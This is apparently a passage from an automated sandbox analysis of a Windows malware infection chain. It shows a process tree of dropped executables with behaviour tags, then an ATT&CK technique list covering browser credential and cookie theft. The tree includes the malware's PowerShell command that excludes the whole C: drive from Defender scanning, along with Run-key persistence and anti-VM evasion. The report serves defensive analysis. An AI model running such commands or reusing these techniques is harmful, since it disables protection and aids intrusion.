      - C:\Users\Admin\AppData\Local\Temp\10494570101\9sWdA2p.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10494570101\9sWdA2p.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3632
      - C:\Users\Admin\AppData\Local\Temp\10494580101\Rm3cVPI.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10494580101\Rm3cVPI.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:6112
      - C:\Users\Admin\AppData\Local\Temp\10494590101\v1BRaoR.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10494590101\v1BRaoR.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5240
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:4084
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4084 -s 1148
        8⤵
        Program crash
        
        PID:1892
      - C:\Users\Admin\AppData\Local\Temp\10494610101\ibC8xs1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10494610101\ibC8xs1.exe"
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of SetThreadContext
        
        PID:5136
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vlzxykbj\vlzxykbj.cmdline"
        7⤵
        
        PID:5684
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6D66.tmp" "c:\Users\Admin\AppData\Local\Temp\vlzxykbj\CSC520D6031D5FB467AA033FAFFAB5FBDE.TMP"
        8⤵
        
        PID:4916
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:5796
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:4284
      - C:\Users\Admin\AppData\Local\Temp\10494620101\UZPt0hR.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10494620101\UZPt0hR.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: MapViewOfSection
        
        PID:5024
        
        C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
        7⤵
        
        PID:4872
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-MpPreference -ExclusionPath 'C:'
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3212
        
        C:\Windows\system32\svchost.exe
        
        "C:\Windows\system32\svchost.exe"
        7⤵
        Downloads MZ/PE file
        Adds Run key to start application
        
        PID:5800
        
        C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
        
        "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
        8⤵
        Executes dropped EXE
        
        PID:3912
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Add-MpPreference -ExclusionPath C:\
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:13296
        
        C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
        8⤵
        Executes dropped EXE
        
        PID:5392
      - C:\Users\Admin\AppData\Local\Temp\10494630101\521f01c054.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10494630101\521f01c054.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Executes dropped EXE
        Identifies Wine through registry keys
        System Location Discovery: System Language Discovery
        
        PID:1608

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c explorer.exe C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
1⤵
- Suspicious use of WriteProcessMemory
PID:3104
- C:\Windows\explorer.exe
  explorer.exe C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
  2⤵
  PID:2204

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
- Suspicious use of WriteProcessMemory
PID:4460
- C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
  "C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3624
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rnb0gndc\rnb0gndc.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3152
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4939.tmp" "c:\Users\Admin\AppData\Local\Temp\rnb0gndc\CSC72FF7E72B1BE408EA7AB5E18EF1F27F5.TMP"
      4⤵
      PID:4308
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1652

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4916

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c explorer.exe C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
1⤵
PID:2816
- C:\Windows\explorer.exe
  explorer.exe C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
  2⤵
  PID:4924

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
PID:4716
- C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
  "C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:4012
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\a5eryn1z\a5eryn1z.cmdline"
    3⤵
    PID:1376
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA4C7.tmp" "c:\Users\Admin\AppData\Local\Temp\a5eryn1z\CSC692FF0CC5DAE4F309BBA43619390BD5E.TMP"
      4⤵
      PID:3020
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2376

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:3112

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3184 -ip 3184
1⤵
PID:5196

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:5416

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c explorer.exe C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
1⤵
PID:5316
- C:\Windows\explorer.exe
  explorer.exe C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
  2⤵
  PID:5404

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
PID:5744
- C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
  "C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:5136
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dxf15kdc\dxf15kdc.cmdline"
    3⤵
    PID:5708
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES19C.tmp" "c:\Users\Admin\AppData\Local\Temp\dxf15kdc\CSC4A500E97DE8A4BD7AA9970A462CF64D.TMP"
      4⤵
      PID:2664
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2128

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5968

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 4084 -ip 4084
1⤵
PID:1044

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c explorer.exe C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
1⤵
PID:4420
- C:\Windows\explorer.exe
  explorer.exe C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
  2⤵
  PID:4804

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
PID:3168
- C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
  "C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:544
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yu5fohft\yu5fohft.cmdline"
    3⤵
    PID:6036
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES76BD.tmp" "c:\Users\Admin\AppData\Local\Temp\yu5fohft\CSC92AC2A8385040EAAF21D2EDA277556.TMP"
      4⤵
      PID:1680
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:6088

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
1⤵
PID:5108

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
1⤵
PID:2832

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Modify Authentication Process

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Modify Authentication Process

Modify Registry

T1112

Virtualization/Sandbox Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Modify Authentication Process

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion